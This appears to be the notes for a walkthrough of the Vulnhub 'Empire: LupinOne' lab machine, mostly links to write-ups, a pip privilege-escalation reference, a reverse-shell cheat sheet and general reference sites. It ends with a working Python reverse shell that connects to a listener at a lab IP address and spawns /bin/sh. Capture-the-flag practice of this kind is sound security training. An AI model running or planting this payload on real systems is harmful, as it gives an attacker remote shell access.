Vulnhub Machine - https://www.vulnhub.com/entry/empire-...
Medium Blog I followed - / lupinone-vulnhub-walkthrough
Additional related blogs - / vulnhub-lupinone
PIP vulnerability - https://gtfobins.github.io/gtfobins/p...
Cheat sheet (Reverse Shell) - https://swisskyrepo.github.io/Interna...
Supportive sites
https://m0053sec.wordpress.com/2020/0...
https://www.dcode.fr/cipher-identifier
https://www.cloudflare.com/en-gb/lear...
https://www.kali.org/tools/ffuf/
https://www.freecodecamp.org/news/web...
https://developer.mozilla.org/en-US/d...
https://www.freecodecamp.org/news/how...
https://unix.stackexchange.com/questi...
https://en.wikipedia.org/wiki/Symboli...
https://unix.stackexchange.com/questi...
##python reverse shell I used
import socket, os, pty
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.56.102", 4242))
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
pty.spawn("/bin/sh")